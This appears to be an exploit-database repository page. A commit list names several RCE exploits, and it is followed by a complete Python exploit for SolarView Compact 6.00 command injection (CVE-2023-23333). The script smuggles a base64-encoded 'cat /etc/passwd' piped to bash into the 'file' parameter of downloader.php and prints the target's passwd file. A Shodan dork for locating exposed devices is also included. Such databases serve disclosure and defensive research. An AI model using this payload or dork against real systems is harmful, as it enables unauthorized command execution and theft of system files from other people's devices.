2af1700331
10 changes to exploits/shellcodes/ghdb Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) SolarView Compact 6.00 - Command Injection Viessmann Vitogate 300 2.1.3.0 - Remote Code Execution (RCE) GitLab CE/EE < 16.7.2 - Password Reset JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow KiTTY 0.76.1.13 - Command Injection
39 lines
No EOL
1.2 KiB
Python
Executable file
39 lines
No EOL
1.2 KiB
Python
Executable file
#- Exploit Title: SolarView Compact 6.00 - Command Injection
|
|
#- Shodan Dork: http.html:"solarview compact"
|
|
#- Exploit Author: ByteHunter
|
|
#- Email: 0xByteHunter@proton.me
|
|
#- Version: 6.00
|
|
#- Tested on: 6.00
|
|
#- CVE : CVE-2023-23333
|
|
|
|
|
|
import argparse
|
|
import requests
|
|
|
|
def vuln_check(ip_address, port):
|
|
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
|
|
response = requests.get(url)
|
|
if response.status_code == 200:
|
|
output = response.text
|
|
if "root" in output:
|
|
print("Vulnerability detected: Command Injection possible.")
|
|
print(f"passwd file content:\n{response.text}")
|
|
|
|
|
|
else:
|
|
print("No vulnerability detected.")
|
|
else:
|
|
print("Error: Unable to fetch response.")
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
|
|
parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
|
|
parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
|
|
args = parser.parse_args()
|
|
|
|
ip_address = args.ip
|
|
port = args.port
|
|
vuln_check(ip_address, port)
|
|
|
|
if __name__ == "__main__":
|
|
main() |